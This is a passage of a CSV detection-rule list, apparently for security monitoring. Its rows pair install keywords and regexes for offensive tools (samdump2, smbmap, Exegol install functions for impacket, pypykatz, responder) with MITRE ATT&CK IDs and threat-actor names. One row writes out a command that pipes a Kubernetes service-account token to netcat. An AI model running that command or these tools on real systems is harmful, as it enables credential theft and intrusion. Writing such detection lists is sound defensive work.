contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","48624" "*install samdump2*",".{0,1000}install\ssamdump2.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","Black Basta","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","48625" "*install smbmap*",".{0,1000}install\ssmbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. 
List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","48626" "*install smbmap*",".{0,1000}install\ssmbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","48627" "*install tor deb.torproject.org-keyring*",".{0,1000}install\stor\sdeb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48629" "*install udmp_parser*",".{0,1000}install\sudmp_parser.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","48631" "*install wapiti*",".{0,1000}install\swapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","48632" "*install -y netcat; cat /run/secrets/kubernetes.io/serviceaccount/token | nc *",".{0,1000}install\s\-y\snetcat\;\scat\s\/run\/secrets\/kubernetes\.io\/serviceaccount\/token\s\|\snc\s.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","48633" "*install_aclpwn*",".{0,1000}install_aclpwn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48637" 
"*install_ad_apt_tools*",".{0,1000}install_ad_apt_tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48638" "*install_adidnsdump*",".{0,1000}install_adidnsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48639" "*install_amber*",".{0,1000}install_amber.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48640" "*install_bloodhound*",".{0,1000}install_bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48641" "*install_bloodhound-import*",".{0,1000}install_bloodhound\-import.{0,1000}","offensive_tool_keyword","exegol","Fully 
featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48642" "*install_bloodhound-py*",".{0,1000}install_bloodhound\-py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48643" "*install_bloodhound-quickwin*",".{0,1000}install_bloodhound\-quickwin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48644" "*install_certipy*",".{0,1000}install_certipy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48645" "*install_certsync*",".{0,1000}install_certsync.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - 
T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48646" "*install_coercer*",".{0,1000}install_coercer.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48647" "*install_crackhound*",".{0,1000}install_crackhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48648" "*install_cracking_apt_tools*",".{0,1000}install_cracking_apt_tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48649" "*install_crackmapexec*",".{0,1000}install_crackmapexec.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black 
Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48650" "*install_cypheroth*",".{0,1000}install_cypheroth.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48651" "*install_darkarmour*",".{0,1000}install_darkarmour.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48652" "*install_dfscoerce*",".{0,1000}install_dfscoerce.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48653" "*install_donpapi*",".{0,1000}install_donpapi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48654" "*install_enum4linux-ng*",".{0,1000}install_enum4linux\-ng.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48655" "*install_enyx*",".{0,1000}install_enyx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48656" "*install_evilwinrm*",".{0,1000}install_evilwinrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48657" "*install_finduncommonshares*",".{0,1000}install_finduncommonshares.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48658" "*install_gmsadumper*",".{0,1000}install_gmsadumper.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48659" "*install_goldencopy*",".{0,1000}install_goldencopy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48660" "*install_gosecretsdump*",".{0,1000}install_gosecretsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48661" "*install_gpp-decrypt*",".{0,1000}install_gpp\-decrypt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48662" "*install_hashonymize*",".{0,1000}install_hashonymize.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48663" "*install_impacket*",".{0,1000}install_impacket.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48664" "*install_keepwn*",".{0,1000}install_keepwn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48665" "*install_kerbrute*",".{0,1000}install_kerbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48666" "*install_krbrelayx*",".{0,1000}install_krbrelayx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48667" "*install_ldapdomaindump*",".{0,1000}install_ldapdomaindump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48668" "*install_ldaprelayscan*",".{0,1000}install_ldaprelayscan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48669" "*install_ldapsearch-ad*",".{0,1000}install_ldapsearch\-ad.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48670" "*install_lnkup*",".{0,1000}install_lnkup.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48671" "*install_lsassy*",".{0,1000}install_lsassy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48672" "*install_manspider*",".{0,1000}install_manspider.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48673" "*install_mitm6_pip*",".{0,1000}install_mitm6_pip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48674" 
"*install_noPac*",".{0,1000}install_noPac.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48675" "*install_ntlmv1-multi*",".{0,1000}install_ntlmv1\-multi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48676" "*install_oaburl*",".{0,1000}install_oaburl.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48677" "*install_PassTheCert*",".{0,1000}install_PassTheCert.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48678" "*install_pcredz*",".{0,1000}install_pcredz.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven 
hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48679" "*install_petitpotam*",".{0,1000}install_petitpotam.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48680" "*install_pkinittools*",".{0,1000}install_pkinittools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48681" "*install_polenum*",".{0,1000}install_polenum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48682" "*install_privexchange*",".{0,1000}install_privexchange.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 
T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48683" "*install_pth-tools*",".{0,1000}install_pth\-tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48684" "*install_pygpoabuse*",".{0,1000}install_pygpoabuse.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48685" "*install_pykek*",".{0,1000}install_pykek.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48686" "*install_pylaps*",".{0,1000}install_pylaps.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48687" "*install_pypykatz*",".{0,1000}install_pypykatz.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48688" "*install_pywhisker*",".{0,1000}install_pywhisker.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48689" "*install_pywsus*",".{0,1000}install_pywsus.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48690" "*install_responder*",".{0,1000}install_responder.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
